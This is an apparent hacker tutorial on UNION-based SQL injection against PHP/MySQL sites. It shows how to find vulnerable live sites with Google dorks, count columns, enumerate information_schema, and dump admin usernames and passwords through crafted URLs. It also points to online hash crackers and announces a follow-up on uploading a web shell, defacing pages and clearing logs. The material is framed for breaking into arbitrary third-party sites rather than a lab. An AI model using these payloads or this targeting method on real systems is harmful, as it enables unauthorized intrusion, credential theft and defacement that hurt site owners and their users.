Basic SQL Injection
Finding the vulnerability
A few Google dorks turn up pages built in the pattern this tutorial targets: a PHP script that takes a numeric id from the query string. These are the most common ones. How do you use a dork? Nothing special, just paste it into Google's search box.
inurl:php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
Now open any Google result and add a single quote right after the URL (like this --> www.site.com/php?id=5'). Use a straight ASCII apostrophe, not a curly one. If you get a database error, or some content that was on the page disappears, the parameter is probably being pasted straight into an SQL query and the site is a candidate for SQL injection. An error alone is a hint, not proof; the next steps confirm it.
Let's find the number of columns
To find the number of columns in the query we use ORDER BY (normally it tells the database how to sort the result, but ORDER BY n with n larger than the number of selected columns is an error). So how do we use it? Just increment the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like Unknown column '4' in 'order clause' or something similar)
The trailing /* opens a comment that swallows the rest of the original query; MySQL accepts it unterminated. If it does not work on a target, -- followed by a space (encode the space as %20 or +) or # do the same job.
That means the query has 3 columns, because we got an error at 4. Now let's use UNION to find which of those columns is actually shown on the page.
http://www.site.com/news.php?id=5 union all select 1,2,3/* (the UNION must select the same number of columns we just counted; if no number shows up, put a minus sign before the 5, i.e. id=-5, so the original query returns no row and the UNION row is the one displayed)
Now if we see one of the numbers on the page, i.e. 1 or 2 or 3, then the UNION works and that column is reflected in the output.
Let's say 2 is the reflected column. Next, find the database version: if it is 5 or greater, the information_schema database exists and the method below will work. On MySQL 4 there is no information_schema, so table and column names have to be guessed instead.
Let's find the version
http://www.site.com/news.php?id=5 union all select 1,version(),3/*
If the version shown is 5 or greater, this method will work.
http://www.site.com/news.php?id=5 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() /*
Now we have a list of the tables in the current database (table_schema=database() restricts it to the one the site uses), but we are interested only in the admin username and password.
Look in that list for a table called admin, admin_panel, users or something similar.
http://www.site.com/news.php?id=5 union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() /*
Note the column is called column_name, not columns_name. To list only the columns of the table you picked, add and table_name='admin' (with the real table name) to the WHERE clause. group_concat() output is cut off at group_concat_max_len (1024 characters by default), so on a big schema you may need the table_name filter or LIMIT to see everything.
OK, search the output for things similar to: user, username, users, id and pass, password, passwd, passw, pw.
Here I found: ru_user & ru_pass
OK, now we do this (0x3a is the hex for a colon, so each entry comes out as user:password):
http://www.site.com/news.php?id=5 union all select 1,group_concat(ru_user,0x3a,ru_pass),3 from ru_admin /*
Now you have the username and password. In my case I got plain text, but sometimes you will get a hash that you need to crack. If it is 32 characters long and made only of hex digits (0-9 and a-f), it is most likely an MD5 hash. md5decrypter.co.uk and md5crack.com are examples of online crackers; also Google the hash, it can give results. That completes the basic (UNION-based) SQL injection. Now use an admin finder to locate the admin panel. In my next tutorial I will explain how to upload a shell, deface an index page and clear the logs.
If you have any questions, feel free to leave a comment.